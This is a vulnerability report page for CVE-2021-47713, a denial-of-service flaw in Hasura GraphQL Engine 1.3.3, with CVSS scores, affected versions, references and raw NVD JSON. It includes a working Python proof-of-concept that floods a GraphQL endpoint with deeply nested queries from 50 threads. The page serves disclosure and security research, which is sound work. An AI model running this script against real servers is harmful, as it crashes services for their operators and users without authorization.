Security Vulnerability Report
中文
CVE-2021-47713 CVSS 7.5 HIGH

CVE-2021-47713

Published: 2025-12-22 22:15:59
Last Modified: 2025-12-26 16:56:28
Source: [email protected]

Description

Hasura GraphQL 1.3.3 contains a denial of service vulnerability that allows attackers to overwhelm the service by crafting malicious GraphQL queries with excessive nested fields. Attackers can send repeated requests with extremely long query strings and multiple threads to consume server resources and potentially crash the GraphQL endpoint.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:hasura:graphql_engine:1.3.3:*:*:*:*:*:*:* - VULNERABLE
Hasura GraphQL Engine < 1.3.4
Hasura GraphQL Engine 1.3.3
Hasura GraphQL Engine 1.3.2
Hasura GraphQL Engine 1.3.1
Hasura GraphQL Engine 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import concurrent.futures import time # CVE-2021-47713 PoC - Hasura GraphQL DoS via nested queries # Target: Hasura GraphQL Engine <= 1.3.3 TARGET_URL = "http://target-graphql-server/v1/graphql" def create_malicious_query(depth=10): """ Generate a deeply nested GraphQL query to trigger DoS """ def build_nested(depth, field_name): if depth <= 0: return f"{field_name} {{ id }}" return f"{field_name} {{ id {build_nested(depth-1, field_name)} }}" query = f"query {{ {build_nested(depth, 'users')} }}" return {"query": query} def send_request(session, payload): """ Send malicious GraphQL request """ try: headers = {"Content-Type": "application/json"} response = session.post(TARGET_URL, json=payload, headers=headers, timeout=30) return response.status_code except Exception as e: print(f"Request failed: {e}") return None def exploit(): """ Main exploit function - send multiple nested queries """ session = requests.Session() payload = create_malicious_query(depth=15) print(f"[*] Starting DoS attack on {TARGET_URL}") print(f"[*] Payload size: {len(str(payload))} bytes") with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor: futures = [executor.submit(send_request, session, payload) for _ in range(100)] for future in concurrent.futures.as_completed(futures): future.result() print("[*] Attack completed") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47713", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:15:58.720", "lastModified": "2025-12-26T16:56:27.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hasura GraphQL 1.3.3 contains a denial of service vulnerability that allows attackers to overwhelm the service by crafting malicious GraphQL queries with excessive nested fields. Attackers can send repeated requests with extremely long query strings and multiple threads to consume server resources and potentially crash the GraphQL endpoint."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hasura:graphql_engine:1.3.3:*:*:*:*:*:*:*", "matchCriteriaId": "8E8F422D-10A0-469B-864D-D91498386D84"}]}]}], "references": [{"url": "https://github.com/hasura/graphql-engine", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/49789", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/hasura-graphql-denial-of-service-via-malicious-graphql-query", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.